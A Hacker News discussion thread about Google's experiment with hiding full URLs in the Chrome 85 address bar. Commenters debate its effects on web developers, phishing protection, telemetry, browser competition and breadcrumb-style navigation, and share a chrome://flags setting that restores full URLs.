Hacker News new | past | comments | ask | show | jobs | submit login
Google adds experimental setting to hide full URLs in Chrome 85 address bar (androidpolice.com)
869 points by vezycash on June 14, 2020 | hide | past | favorite | 698 comments



While this might be useful for a casual user, hidden URLs are a huge problem for web developers. Asking for a screenshot from client is not enough, now I'll have to provide additional instructions how to copy/paste full URL when reporting issues.

Not to mention all possible problems with misconfigured servers when www and www-less domains lead to same website, but some script refuses to work on one of those. While it was easy to spot with just a glance at URL bar, now one has to do additional clicking or opening devtools.

Probably we are at the crossroads where developers need separate, not dumbed-down version of browser.


I'm already annoyed by the hassle it has become to copy a substring of the URL into the clipboard, due to the schemes being hidden. Nothing has been won by hiding http(s):// as well as the www subdomain.


I had a frustrating experience with this only yesterday.

I was trying to search for the word "aquarium" but chrome kept filling in "https://aquarium.org", I would delete the ".org" and only the word "aquarium" was shown in the search bar, which was the word I was trying to search.

Of couse "https://" was hidden, so I was actually submitting "https://aquarium" which was not a valid domain and it took many frustrated clicks and enters to actually google the word that was shown. Absolutely infuriating as the true state of the search bar was hidden.


Even when the scheme is visible I have problems copying a URL substring. Chrome always wants to select the ENTIRE URL instead of just the subpath I'm double-clicking... endlessly frustrating >:(


Them acting like this is some kind of user experience thing is the most insulting part.


Most user experiences aren't the same as developer user experience.


But it is.

The URL bar is a disaster for end users. It's full of random junk that users can't read so they stop trying, which means they can then be tricked by phishing websites hosted on any domain at all. Research shows about 25% of users don't look at the URL bar at all even when typing in passwords, they navigate purely by sight, so it's impossible to stop them being phished. The human cost of the resulting hacking is significant.

The fact that the software industry has routinely prioritised historical inertia, the needs of web developers, and all kinds of other trivialities over the security of billions of people is embarrassing. I'm glad to see the Chrome team finally get a grip on this and make the URL bar actually useful for people.


> The URL bar is a disaster for end users. [...] 25% of users don't look at the URL bar at all even when typing in passwords

"Side view mirrors are a disaster for drivers. 25% of drivers don't even check them before making a turn." [I'll stop the metaphor here, as I think my point was clear]

This change does exactly nothing to improve security. As for usability, it just puts one more layer of paint over the underlying "complexity" - and we've seen before how well that works (see basically every part of Windows 10 for examples).


As someone who has worked on the front line of the fight against phishing and account takeover in the past, I can assure you and others that you're dead wrong. Making this change was a recommendation I made to the Chrome team years ago because the number of people who would reliably type in their username and password to a site hosted on hacked web servers (supershop.co.hk/account_login.php etc) was just so high. And when those accounts got hacked, scamming and sometimes even extortion would follow.

Your side view mirror metaphor is unfortunately not clear at all. The side view mirror is simple and performs its function correctly as designed. It can't really be improved without totally replacing it with something else like a camera. Now of course not everyone will use the URL bar even if it's redesigned to work correctly. But right now the bar is practically designed to look as intimidating and useless as possible.

Perhaps you're so used to parsing URLs in your head you don't realise it, but URLs are a baroque and absurd design that nobody without training could properly figure out. It's basically random bits of webapp memory and protocols splatted onto the screen in a large variety of different encodings. In a desktop app dumping RAM straight onto the screen would be considered a severe bug. On the web it's tolerated for no good reason beyond history.

To give just one example that has regularly confused people in the past: URLs are read left to right except for the domain name (the important part) which is read right to left. You don't stop reading a domain name at .com, you stop reading it at the third slash or possibly a colon, but that form is rare.


As someone who has had to teach grumpy old high school teachers how to not fall for phishing and mitm attacks, I really can't see the problem here.

The way I used to teach was very simple and very effective: there are 3 parts to a URL - the first part tells you if the connection is secure, the second part tells you who you're connected to and the third part tells you where on that site you are. The first part needs to be httpS, the second part needs to be the site you're expecting and the third you can ignore. They're even shaded differently to make it easier to read. "If you're going to Google and the black part ends with anything but google.com, call IT" made sense to even the oldest and most reluctant people I've had to deal with. The problem was actually getting them to check every time and not forget.

It seems to me that this change will not help people without training, change nothing for people with training, and make sharing links even more confusing for everyone.

Are you saying someone is less likely to get phished on "supershop.co.hk" than on "http://supershop.co.hk/account_login.php", even where the http:// part is replaced with a red padlock and /... is grayed out?

I see only one real solution to phishing: don't let users type passwords manually. WebAuthN and password managers both automatically read the domain and won't try to authenticate on a domain that isn't a perfect match. I've had more success with that than any other anti-phishing measure I've tried deploying (history-based domain trust, explicit trust on first use popup, detecting unicode gaps and domains in credential fields...).


Sure, absolutely. People understand domain names, they're found on billboards, adverts, business cards, all over the place. And it's a simple text match. Does the bar say "google.com" or "google.co.uk"? Yes? Then you're on Google. So when it's simple people get used to checking and can be reasonably told they're expected to do it.

The greying out and replacement of padlocks etc, the anti-phishing training, it's all just working around a historical design problem in browsers. There's no need for it to exist. Notably, mobile apps don't have this problem.


> Nothing has been won

google could make an amp-only web experience without dissent.

hide the URL bar

javascript -> webasm

hiding all this benefits data collection and advertising. Seems obvious to me.


It is frustrating isn’t it


>Probably we are at the crossroads where developers need separate, not dumbed-down version of browser.

Yes, we are.

Funny enough, Firefox has a 'Developer edition', but that's just the Beta build, with some features turned-on by default.

https://www.mozilla.org/en-US/firefox/developer/


Firefox's still an option.


The quality of Firefox on Windows as software is much to be desired.

Due to slow loading, I'm considering whatever they call the Microsoft browser today.


Microsoft doesn't have a browser today, it's just a repackaged Chrome supporting the same Blink monopoly.

I am honestly surprised Firefox on Windows is slow for you. I don't personally use Windows, but many on here say it works well there since v57.


I have tried to fix this slow loading problem. Happening on 2 separate gaming laptops with SSDs.

Maybe I don't know what to Google.


Try to DuckDuckGo "why is Firefox slow on Google sites" - or just try to guess the answer...


Blink isn’t a monopoly... yet.


For what it's worth I don't experience slow loading with Firefox on Windows, or any notable slowdown in any way.


I definitely do. FF being perceivably slower than Chrome continues to keep me off it.


I only notice this on certain Google sites.


Start Firefox in the Profile selector and try using a fresh new profile. Or start in safe mode. Some old, forgotten configuration or addons are sometimes the cause. For example a privacy-enhancing addon CleanURLs disables ETag functionality by default. So all sites using ETag for caching content won't be cached. Big loss.


Is this still true in Firefox >= 57?


Not in my experience.


Not in my experience.


Not for serious web development (dito for Safari): the developer tools are atrocious compared to Chrome, the battery life experience is way worse with FF, and while Chrome is a notorious CPU and RAM hog, FF is worse.

That combined with both FF and especially Safari being way behind in terms of standards adoption/development really sucks at the moment. Chrome desperately needs competition.


In my experience FF is not behind chrome with new features. It's usually on par, or even better. Sure safari is annoying. But the developer tools in firefox are alright. I even find them better when it comes to debugging css stuff.


It's odd that you mention how Chrome needs competition but also decry lack of features in other browsers. That is one of the ways they are attempting to monopolize the space.

The standards are meant to be agreed upon by several parties, including both Google and Mozilla. Google implements new features in order to control the way they work, instead of allowing input by all the parties involved. It's always faster for one company to just do whatever they want than for a group of organizations to come to an agreement on what to do. The slower way results in better and more equitable implementation for everyone though.


Why do you say so with such certainty, though? I find it nearly impossible that you never saw someone claiming the opposite. There's even such a response to your own comment so clearly this experience is not universal.


Google does have an amazing access to data on how 80 - 90% of users are using the Internet, for many Google is the entry point for their Internet experience. Maybe their data is telling them that the URL bar is basically unused?


That's probably because most advanced users turn off all telemetry when possible. And http://localhost is probably ignored in statistics anyway.


I mostly leave telemetry on in products I care about specifically so that my advanced use cases get logged.


Thats admirable, but you are a minority within a minority.


Honestly, if most "advanced" users turn off the features that Google uses to gather data to improve UX, it's strong signal UX isn't important enough to "advanced" users for Google to optimize for it.


It doesn't matter if .1% of users turn off their telemetry, their use case wasn't going to be optimized for either way. In fact the Google employees themselves are part of that .1%, they don't need the data to tell them what's important to advanced users.


What? If most "advanced" users turn off telemetry then they want a terrible product?


Then they're valuing other things more than a UX that caters to them.


Yeah, like their privacy? Since when did getting a good product that respects your privacy become an oxymoron?


Automatic metrics are only one tool in a toolbox that includes focus testing and design aesthetic.

But if a whole subset of users exclude themselves from that tool, they're going to get the UX that's only as good as the other tools in the toolbox are capable of building.


You know software with good UX used to exist before telemetry became a thing?


Definitely, and it continues to exist after as well.

But telemetry gives web developers an extremely simple and convenient tool to know what users are actually doing without even inconveniencing the users with explicit questions. I've done web development with a good telemetry set built into a page, and it is extremely informative regarding how users actually use the tool, as opposed to how the UX designers have predicted flow through the tool will be.

To give a concrete example, a user might tell you that configuring permissions is "hard," and sitting with them during over the shoulder testing (which is expensive) might tell you a little bit about why. But without even asking the user, page telemetry can tell you that they are making a transition jump from the permissions configuration page to the page listing all of the resource names, because that's what's slowing them down---the UI didn't give them enough information to configure the resources because we assumed they knew what the resources were named.

For a browser, anonymized usage stats can tell you whether most users keep all their bookmarks flat at the top of the bookmark bar or deeply nested in multiple subfolders, and that's usually valuable for deciding whether you want to emphasize a flat bar or folder management in the design.

If most power users disable automatic anonymous telemetry and also use deeply-listed folders, no one should be surprised if deeply nested folders doesn't get better.


Yeah, invading people's privacy always makes things easier for everyone else, doesn't it? Doesn't mean people who care about it don't want or deserve quality...


"Deserve" is complicated. To a first approximation that ignores a lot of details... What have they done to "deserve" it? They didn't buy it. They aren't making the process of figuring out what they want particularly easy.

People who don't show up to vote also "deserve" a good government by virtue of being people who have to live in a governed society. It's harder to make one for them if the system for selecting leaders is missing their input, regardless of what they deserve.

Popping out of the government analogy and back to software, power users are also in a position where they are more capable of adjusting their experience to suit their needs. All things being equal, a company with finite resources to develop software should dedicate those resources to assisting the non-power users more often than power users.


While you argue your case, that one has to vocalise if one wants something, well, you are still ignoring the basic want of not having your privacy violated and the fact that you can vocalise something willfully, without it being spied away from you. I'm also extremely suspicious of the suggestion that this is something only power users would want.


You can certainly vocalize something willfully. But the people who don't have to do any vocalization at all and are generating megabytes to gigabytes of data on how the application is used by their mere use of it are going to always have a default stronger voice than people who bother to show up on message boards to voice specific concerns.


I actually agree that if you are willing to ignore privacy concerns and a potentially large part of your userbase, then you can simply send megabytes to gigabytes of telemetry and pretend that is the best you could have done and that you have the best data. I'm simply saying that's not a good idea.


a) It's not a large part of the user base who switches off telemetry and they have the telemetry to know that

b) for being "not a good idea", it's pretty much industry standard now for everything from business software to video games.


> a) It's not a large part of the user base who switches off telemetry and they have the telemetry to know that

So you're claiming that it is typical for software with telemetry support to ignore your choice and still send telemetry about you turning off telemetry? That sounds wrong, but I cannot say I investigated this deeply.

> b) for being "not a good idea", it's pretty much industry standard now for everything from business software to video games.

As I understood the discussion, we were in fact discussing whether this is a good idea and whether it makes sense, so I think it's fair game to comment on it. As for it being an industry standard, that sounds like an overgeneralization. It is certainly not typical of software I use.


> So you're claiming that it is typical for software with telemetry support to ignore your choice and still send telemetry about you turning off telemetry? That sounds wrong, but I cannot say I investigated this deeply.

No; I'm saying missing data leaves holes that can be measured. They know, for example, how many people have downloaded Chrome and how many daily Chrome users they get at google.com (because Chrome will still send a valid UA string if it has telemetry turned off). They can estimate how many users have telemetry turned off from those signals to a pretty decent degree of accuracy; certainly enough to know whether telemetry is telling them about 90% of users of 30%.

For (b), I'm curious what software you use. It's pretty standard in games, online apps, and business software. It's absent in a lot of open-source (mostly because a lot of open-source lacks a centralized vendor who would be willing to pay the cost to collect and interpret that data to improve the software).


Is Chrome's telemetry so invasive that it reports about all URLs visited? Otherwise I don't see how daily Chrome visitors on google.com would be helpful in this estimate.

I avoid online apps, I don't play a lot of games (and if I do, they're not big titles which are likely to have telemetry) and yes, I primarily use FOSS.

> (mostly because a lot of open-source lacks a centralized vendor who would be willing to pay the cost to collect and interpret that data to improve the software).

This is almost surely an element of it, but I think a respect for privacy and a general distaste for telemetry among FOSS users are more important.


But they don't have that signal...


Missing data leaves its own wake. Google has numbers to extrapolate how many turn off usage reporting. They lack automated signal in how the users use the tools.


I do this as well. As an end-user, I actually find some telemetry useful to diagnose things like:

* Apple Watch battery cycle count (not viewable in any UI but is viewable in telemetry logs)

* Clues about why a particular app recently crashed


That would be nice. They should share that data to help others understand the decision they are making. Or at least they could reference the data in their decision making.


there is a trick for at least chrome before 85, where if you install the google-made extension "suspicious site reporter" it will show the full url including protocol (which you can't even do with flags so it tampers with something internally which means they don't have to do this at all)


Asking a user to install "suspicious site reporter" in order to send a bug report is going to throw up a few problems.


I highly doubt a non-default extension has extra permissions that aren't available to regular extensions...

Can anyone reproduce this?


The extension ID is literally hard coded in the code of the scheme hiding code. https://source.chromium.org/chromium/chromium/src/+/master:c...


How a proprietary extension can get preferential features illustrates that chromium is open source in name only.


Hardly. If you look at firefox's source, you will find several extensions that are hard-coded for special handling. This is not new.


True, but the distance between Firefox source and Firefox is config+compile.

You cannot compile Chrome. I've heard that Chromium can be compiled and run, but I've never actually seen it, or hear of anyone using that professionally.


I'm not sure what your point is... You thought it was weird that an extension would get preferential treatment, and I pointed out that this is true for Firefox also.


My point is that you are correct.

There are other factors at play which mitigate the preferential treatment, but it's definitely there in Firefox as well.


I looked into it several months ago and it looks like that extension is whitelisted to do it. If you try to repack the crx file and install it, the address bar doesn't get changed.


Developers at least the experienced ones never left firefox. For the new developers who got hooked on chrome over the last 10/15 years time to move to a developer friendly browser.

At this point ie becomes more useful.


This is just simply inaccurate. I have 25 years of web dev experience and left Firefox because Chrome's dev tools were far, far superior to those of Firefox.


Blink is the most common browser engine. Firefox has some nice developer tools but if you don't test in blink throughout the day then you're just asking for problems.


Blink will remain the most common if that's all devs continue to optimize for. Not a way to change anything for the better.


And it's what devs will continue to optimize for while it continues to be most common.

The goal of most web developers is to make pages users can use, not get mired down in the never-ending browser wars.


It's the most common because devs optimize for it. That's a Catch 22 you can't break out of if you continue to optimize for it, an infinite loop.


Yes. That is network effect.

As the smaller vendor, it's incumbent upon Mozilla to break it. Expecting individual devs to do it collectively when it really isn't in their selfish interests is waiting for a unicorn to appear.


> As the smaller vendor, it's incumbent upon Mozilla to break it.

That's kind of impossible to do for a smaller vendor without wider developer cooperation.

I remember Mozilla only started to breach IE's dominance once devs were so sick of IE that they installed Firefox on their mom's computer despite tons of sites being made for IE.

It's possible for something like it to happen again with Chrome, but less likely since Google's a lot smarter and not too lazy to implement latest tech, so it will sure take longer without some activism and evangelism from web devs.

> expecting individual devs to do it collectively when it really isn't in their selfish interests is waiting for a unicorn to appear

Selfishness is a lot more complicated thing than people give it credit for. A lot of 'selfless' acts could be alternatively described as selfish in that it makes one feel good. Free software developers already do a lot of work for the wider community, where probably it would be a lot easier to just use the proprietary, already feature-rich, counterpart than trying to develop a libre alternative. But the movement understands that long-term, having as much free software as possible is what will in the end help preserve general-purpose computing in the sea of silos. It takes some discipline, sure, but long-term it's actually in one's selfish self-interest.


But that's the thing, if Google is responsive enough to implementing new technologies and improving their browser, there's no reason for most web devs to advocate for an alternative browser. A (high-quality) monoculture is actually much much easier on most web devs, because it minimizes the number of browsers they have to support for quirks.


> A (high-quality) monoculture is actually much much easier on most web devs, because it minimizes the number of browsers they have to support for quirks.

Short-term, sure. Long-term it opens devs to Google's whims and makes the "open" web barely more open than Apple's AppStore.

But that's short-term vs long-term thinking and I can't deny most would prioritize the short-term. Here's hoping there's still enough idealists, even among web devs to avoid that fate and bring about for the web what GNU did for UNIX in the 80/90s.


GNU did great things for UNIX. It hasn't really demonstrated much utility in the user experience improvement space. The flow there, in general, appears to be that the big, closed source commercial interests devise new approaches for user interface operation and the open source community copies the ones that work.

The only space I can name off the top of my head where my open-source architectures have outstripped Windows and Mac in UX is virtual desktops.


If you're taking casual computer experience, KDE's still way more customizable than any of the commercial desktop environments out there.

Of course proprietary software has more funding to hire designers and such, but in terms of actual functionality, I'd contest your claim.

If you're talking developer user experience, it's not even a race. The FLOSS ecosystem has a landslide lead here. In fact the whole point of WSL is to try to keep devs on the Windows platform by bringing that experience to Windows more directly.


> If you're taking casual computer experience, KDE's still way more customizable than any of the commercial desktop environments out there

Customizability is orthogonal with out-of-the box UX, the original axis of comparison here. In fact, the two are often at odds.


Same as saying a benevolent tyrant is the best govt. Viewed from a certain angle it could be arguably true, yet none of us would trade democracy for it because we understand quality and efficiency are not the only factors but need to be weighed with other ethical and social ones.

The history of biological evolution shows that monocultures invariably fail catastrophically. Diversity is the main way to guard against unpredictable events of the future. Software is not exempt from these general rules I'd presume.


I'd be conservative extrapolating from lessons of government and biology to software engineering principles. Software doesn't change via random mutation and natural selection pressure; most open source projects are benevolent dictatorships of some flavor or other.


Sorry to interrupt the party here but I feel compelled to point out that Firefox's is actually the third most common engine after Blink and WebKit. The web is not and will not be a monoculture as long as the iPhone exists. There's already two ~trillion dollar juggernauts involved.


Blink is a fork of WebKit though. Firefox is the last big non-WebKit browser afaik.


Perhaps Mozilla should never have made breaking changes that pushed people away? The UI change that killed my extensions made me look elsewhere. Chrome's much faster js engine sealed the deal.

I've looked into switching back to Firefox, but what I've found is that they don't allow me to use my own extensions. I would have to use a beta version of Firefox or submit all of my extensions that only I use for approval to Mozilla or have to reinstall my extensions every time I close Firefox. None of these seem good options to me.


If you're relying on bug reports to find why a page is broken you're in for a bad time because 99% of the time the user isn't going to report anything. They're just going to think your page is broken and stop using it. Use a telemetry and error reporting service like Sentry or Rollbar. These services can strip sensitive data on the client before it gets logged.


Not every bug results in an error being thrown or any other signal that you could automatically detect. From my experience most of them are way more subtle.


While parent’s point is for devs, any kind of support situation falls into the same issues.

Grand-parents/friends/org users not being sure to be on the right site after a redesign, not seeing amazon in the right language, etc. There’s countless of questions that can be solved faster by looking at the URL.


Sentry only capture software exceptions. It doesn't tell you a page is rendering badly in the user's browser.


You can send your own events to Sentry. It's not just for exceptions.


How do you make an event for rending looks weird, or text is unreadable or ?


Have a "report issue" button which leverages Sentry's (or your own, or some other service's) metadata collection and sends a report to you.


My QA team sends me URLs and screenshots sometimes. Often the first thing I look for on a screenshot is the URL.


How can I tell you don't work in IT? Almost all companies including mine have ONE site to choose from to do any one thing. If it doesn't work, they either ask their colleagues (which only works if it's not the first time someone is using this around them) or create a ticket for IT.


I've been a web developer for about 25 years. I can assure you if something doesn't work the users usually won't raise a ticket. They'll work around the problem. On the occasions when they do raise a ticket it'll usually contain minimal information. Having a telemetry system to correlate it against gives you some information to use to debug the problem. That's helpful.

Understanding that users have more important things to do than spend time on bug reports is an important lesson to learn. If you can gather data without relying on someone whose job is to worry about other things then you will make everyone's life easier.


I actually wouldn't mind if the URL bar was replaced with a breadcrumb bar on some sites, like news and forums. Imagine something like

Example.com > Worldnews > 2020 > 06 > 14 > Big aquatic monster spotted outside of Tokyo

or

forum.example.com > Sport > Football > Spain > Real Madrid

It could then work like in Explorer in Windows 10, where you can press one of the breadcrumb separators and see a menu with siblings, or go straight to all news this month. It could use some manifest file in a standard format on the server for the directory information.

Of course, this should never replace the URL completely, you should always be able to get to it easily. But URLs aren't necessarily always the best solution for navigation. We tokenize code and apply different colors, mouse over pop-ups, and links, why should the URL bar be a long raw text string when it's really contains structured data?

This Google nonses of hiding everything except the domain is not a good solution IMO, it doesn't solve a problem and makes it harder to navigate, not easier.


I really dislike any attempt to modify strings like this. I find it invariably causes problems in edge cases. What if a site handles slashes differently to how Google expects? Where do GET arguments go? What if I want to modify the URL? Breadcrumbs are great when each part is navigable, but does example.com/worldnews/2020/06 actually lead anywhere, or is it an invalid address for the site? I have absolutely no interest in Google being allowed to dictate what should and should not be a valid address.

Probably worse than the change itself, though, is the tendency of anyone who makes such a change to start playing fast and loose with actually representing the underlying address. You mention Windows 10's address bar - it's one of the worst offenders. My Windows Explorer is currently sitting in my downloads folder, which is at "C:\Users\Wyatt\Downloads". The address bar reads "This PC > Downloads". When I click on the address bar to edit the address, it changes to just "Downloads". What part of all of this is in any way useful to me or the likely action I'm trying to take when I click on the address bar?


"This PC > Downloads" may point to the same directory as "C:\Users\Wyatt\Downloads", but Explorer may also handle or display differently or with different options. I've had various issues with this, such as not being able to copy the full actual path from the address bar, a sub-folder in one of these "This PC" folders or libraries showing no columns with no option to show them, and sometimes being indistinguishable from the Public folder. The full path matters in Explorer, Finder, and browsers, and should never be hidden without an easy visible way to show the full path or have it always show.


In Windows Explorer, if you click to the right of the breadcrumbs, you will get a text input with the full path to the current directory. If a solution for URLs were to attempt to switch to breadcrumbs (seems like it should be site-configurable via a meta tag or something), then a similar click to the right of the breadcrumbs could expose the underlying URL.


if you click Downloads, it won't give the C:\Users\User\Downloads path, it'll just give Downloads.


> I really dislike any attempt to modify strings like this. I find it invariably causes problems in edge cases. What if a site handles slashes differently to how Google expects?

I think it would have to be some standard format that websites use, not just string manipulation in the browsers. And certainly not some Google dictated feature! For the same reason, each part would have to be navigable on these sites, to work as I described. There's various possible solutions, like meta tags or some manifest like breadcrumbs.jsonld mentioned in another comment.

The fact that Windows Explorer doesn't show the full URL in special folders is a separate issue, I only mentioned it for the breadcrumbs example.


If you're talking about something other than manipulating the URL, I don't understand what problem you're solving. Sites which believe that breadcrumbs would be helpful for navigation already have breadcrumbs, I see no reason to force it on everyone else.

But I disagree with you that not showing the full address in Windows Explorer is a separate issue. In my experience loss of edge-case functionality is a core aspect of changing interfaces. Maybe in another world the address would be preserved, and my use case would still work. But someone else's unusual use would not.


Instead of manipulating the URL it would replace it, and instead of each site doing it their way it would be handled by the browser in the browser UI. Sites can implement their own back button too, doesn't mean that's where it belongs.

Think about how Powershell use objects instead of text to chain together commands. The address isn't just text, it's structured data, why not treat it as such and make it more useful?


Your arguments are definitely salient.

However, I think there is something to this idea - a breadcrumb style approach by default in Chrome would encourage developers to use paths in more standard ways that refer to resources, not heavy parameter coupling. As you noted, there are technical barriers to implementing this solution, which might encourage some other good things - servers providing resource discovery so that the browser can understand valid paths when visiting a site.


I address that in my point: Google deciding what paths developers should use is precisely what I don't want. I'll decide what resources should be discoverable on my site, not Google. I'll decide what paths should be valid, not Google.

Google has too much power to dictate standards already, and has been quite happy to use that power for their own sake, rather than the good of the user. I'm not interested in giving them any more.


My original point was not about Google specifically, it was about a new feature in browsers in general. I absolutely agree that Google have too much power already.

And like I wrote in my first post, the resource discoverability could be handled by the site itself via some manifest file in a standard format, like robots.txt. It wouldn't be dictated by anybody else.


I find the way Explorer in Windows 10 handles this behavior to be annoying and inconvenient. It finds ways to change paths into new canonical locations, for example browse to C:\Users\Yourname and instead of giving you breadcrumbs like Local Disk > Users > Yourname, it simply shows "Yourname" as a special home folder. When you click back in the address bar, there are no breadcrumbs anymore, it's erased your trail.

Attempts to make things simpler by hiding the truth about where you really are in navigation seems like a way to make the web less discoverable except by Google. If you're on a web site you can usually learn more about its structure based on URL format. This makes that more difficult.


But there's nothing stopping websites from offering that without browser support. It can just show that at the top of the page. Everything it provides is under the authority of the website. The URL needs to be provided by the browser because it's not entirely under the authority of the website, but that's not the case for a breadcrumb bar.


Yes, imagine if the browser vendors decided to _improve the usability of the URL bar_ instead of trying to remove it...

The only difference between

  Example.com > Worldnews > 2020 > 06 > 14 > Big aquatic monster spotted outside Tokyo
  forum.example.com > Sport > Football > Spain > Real Madrid
and

  https://example.com/worldnews/2020/06/14/big-aquatic-monster-spotted-outside-tokyo
  https://forum.example.com/sport/football/spain/real-madrid
is a little bit of reformatting and upcasing and linkifying (or otherwise making selectable) the individual path segments of the URL.

And probably some clever logic to deal with the randomforum.php?fid=12345&tpcid=984.3&page=5 goop that is still all-too-common... :/


>And probably some clever logic to deal with the randomforum.php?fid=12345&tpcid=984.3&page=5 goop that is still all-too-common... :/

You say that as though websites like that are random small sites. HN has that kind of a URL, so do YouTube and Google.


Hacker News doesn't have breadcrumbs either. The concept of a directory hierarchy inherently doesn't fit.

You could try to map the parent ==> child relationship of every individual post URL, which might be cool, but think about how long the URLs would get.

For sites with breadcrumbs though, the URL absolutely should follow the crumbs (and I've argued for such at my company).


> I actually wouldn't mind if the URL bar was replaced with a breadcrumb bar on some sites ...

Which sites?

Anyway, almost everyone else would mind. Especially if there was no option to revert to normal behaviour.

> It could then work like in Explorer in Windows 10, ...

That sounds like the worst of both worlds. If people want Explorer in Windows 10 behaviour - can't they just run Explorer in Windows 10?

If people want Chrome as it was yesterday, they've basically got no option now.

> But URLs aren't necessarily always the best solution for navigation.

The Chromium devs demonstrated their lack of interest in being able to navigate via URL / location bar a half decade ago when they changed the default on all operating systems to be single-click in location bar to 'select the whole address'.

I'm beginning to think they are not our friends.


Note this is talking about Explorer, more recently named File Explorer, rather than Internet Explorer, the browser.


Argh, of course. My mistake.

I typically run up breadcrumbkiller as part of any Microsoft Windows desktop build, so I rarely see that configuration for long.


For myself (and I'd wager most people), I want to clear the URL and go to a totally different URL much more often than I want to manually manipulate the URL I'm currently on, so I like the change in default. Many casual users probably didn't even know a quick way to select the whole URL when it wasn't the default.


The option they have is Firefox


There were several extensions that transformed location bar like you propose, but naturally just did simple domain, path and query segments transformation into clickable buttons producing breadcrumbs. It was a delight to use and I miss them in Firefox since Quantum leap prevented them to work any longer.

https://www.ghacks.net/2011/03/01/improve-firefoxs-urlbar-wi...

They by default worked very similarly the aforementioned Windows Explorer, what in focused state with keyboard input turns into "raw" text field.


On some sites, this could be done using breadcrumbs.jsonld:

https://developers.google.com/search/docs/data-types/breadcr...

Sadly not used everywhere, but maybe browser support would encourage its usage by site owners.


I’ve implemented this on my site. The pain in the ass is that Google will only sometimes show you the breadcrumbs, so it’s very difficult to tell if you encoded it correctly.


Very few URLs are perfectly hierarchical in a way that would work with this scheme. For example, look at the URL of this page you're reading now.


I think that's a great example of the benefits though. HN could continue to use their fairly opaque URLs in the background, but instead show something like

news.ycombinator.com > 2020 > 06 > 14 > Google hides full addresses in URL bar on Chrome 85

This makes it easy to not only see where you are, but also quickly click on a part of the address to go to that hierarchy, or a sibling like yesterdays posts. It makes sense that a forum like this would have a way too see all posts from a day, month, or year.

Of course, most if not all users here are comfortable with URLs so they're probably not the ones that would benefit the most. But I think most common users, the ones who Google everything instead of typing in an address, would use the breadcrumb bar while today they probably see the URL as some weird text string they have little interest in or understanding of.


While we often create a mental map between some sort of logical hierarchy and the segments of the url this doesn't have to be the case. A specific domain should be authority on this, not he general-purpose tool used to access it.


There was an extension in Firefox that used to do exactly this. Seems like it did not survive the Mozilla War Against Addons, unfortunately.


At chrome://flags there is one called #omnibox-context-menu-show-full-urls, which I have turned on.

This enables you to right click on the address bar, and turn on the option "Always show full URLs". It will always shows the full URL including the protocol, but I suspect they will remove this flag at some point.


I don't think they will remove it soon, since it was just added¹ after a lot of complaints about the default behavior².

Now how does this new flag interact? Has anyone enabled both to see?

1: https://bugs.chromium.org/p/chromium/issues/detail?id=106157...

2: https://bugs.chromium.org/p/chromium/issues/detail?id=883038...


A heads up for those with lots of tabs open: This requires a browser restart, and setting it once seems to set it for all profiles.


If you happen to close your browser and lose your tabs, use the reopen closed tab menu option, it'll bring all the closed tabs (even if multiple tabs).


Even safer is to use an extension like Session Buddy, to explicitly save tabs and windows, including exporting to files.


I can't find this option on Chrome on Linux. I had to get an extension to show the full URL, but it only works for 'https://' URLs, not for 'http://'.

This drives me crazy when debugging. Whenever I copy-paste IP addresses from the browser address bar into my console, I have to manually delete the `http://` at the front. I work on a P2P project so this is an extremely common situation for me.


Are you running version 83 or later? I think they introduced the flag in that one.

Another solution for Windows and macOS users (no Linux sadly) is to use Edge Chromium, which does it by default, and you prefer to donate your data to Microsoft rather than Google like me :)


Oh wow, http:// and https:// are back! I've been waiting years for that option.


Thanks. I enabled that flag last week and thought it didn't work. I didn't know there was a second step. Much better now.


Wow, thank you so much! My nervous system already feels better with this working.

Seriously, I keep looking at the address bar to make sure the URL is still there and I'm not dreaming.


Absolutely true, but well-meaning advice like "just use an adblocker" and "why not use a VPN" somehow doesn't quite cut it for me. Defaults matter.


Yes they always remove such flags later, does not matter if it's there right now.


This is exactly what I'm afraid of. there used to be chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains (when I google how to make chrome show the full url bar, this is the recommended answer) but it's been gone entirely for several Chrome versions. I even toggled a flag to undo flag deprecations in Chrome 78 to get this back but that didn't work very long - I think this flag has been totally dead since Chrome 80ish.

I personally don't care much what the default is for the normal user, but I want to be able to have my full urls.


Which is ridiculous, because there’s thousands of these flags for things they don’t have an agenda to see gone.


In fairness, the OP is about another such flag, so the same argument would apply to that one.


> At chrome://flags ...

Is there also a #upgrade-to-firefox-immediately flag ?


OK, I just don’t get it anymore. I mean I’m a happy Firefox user, so it’s not like this personally impacts me, but how in the heck is seemingly nobody acknowledging that this has been the behavior in Safari for a long time now? This seems to be a recurring pattern.


I've got a couple of guesses. Apple is somehow regarded as being a pro-user company, not having plans of taking over the web. Also, Apple users are accustomed to UI changes that result in visual simplicity. Nevermind that their actions result in patronizing the user just the same as Google does, in their case those actions are more likely to be perceived as innocuous.


Cmd+f Safari, I'm equally surprised no one but you mentions it.

However: I believe Apple's motives are aligned with their users and they want their browser to be as safe and as easy to understand/use as possible. Their primary intention is to sell their shiny expensive hardware.

With Google it's more controversial, because who knows what's the plan. Combined with AMP there is a reason to be wary.

Ofc, one can make bad decisions based on good motives.


The other day, our 7 year old told me that [ is 5B and ] is 5D. I was quite impressed that he knew this, and I asked him how he knew it. He told me it was from reading the address bar in Roblox. Needlessly hiding technical details from kids is going to limit their learning.


This, exactly. People learn not only when they are forced to, but naturally from observing their environment too. The more opportunities to "spontaneously learn" you take away from them, the less they will learn.

Here's a comment I made from several years ago when Chrome tried to do before what it's trying again now (it's not the first time): https://news.ycombinator.com/item?id=7678729

Maybe this next point is starting to go into the realm of conspiracy theory, but I see far too much evidence of it every day: companies are doing this because they don't want users to learn. They want to keep users naive, docile, and compliant, and thus easier to "herd" for their purposes. They don't want people knowing the truth behind how things work; they would rather "developers" (and only those who explicitly chose to be one --- probably for monetary reasons) learn from their officially sanctioned documentation (which does not tell the whole truth), and not think or discover for themselves.

(I've memorised most of printable ASCII because I did a lot of Asm programming decades ago, so I instantly understood what you mean.)


Not sure how much actual conspiracy is in there, but I've definitly noticed that the gap between "consumer software" (highly optimized for ease of use but also highly limited and designed with a specific intention how users should interact with it) and "professional software" (powerful and flexible but only usable after extensive training, often command-line only) is widening instead of closing.

There are also definitly conscious design descisions how "cryptic" a particular feature should appear to users. I remember several bugzilla threads with discussion whether a config option should be exposed as an "ordinary" field in the settings or only as an option in about:config, so that normal users won't find it.


Coffee hasn't kicked in yet, took me a while to figure out you were saying '[' url encodes to 5B and ']' url encodes to 5D


I read that sentence 10 times. Wow.


This is how I learned them too (though about:… in IE5).


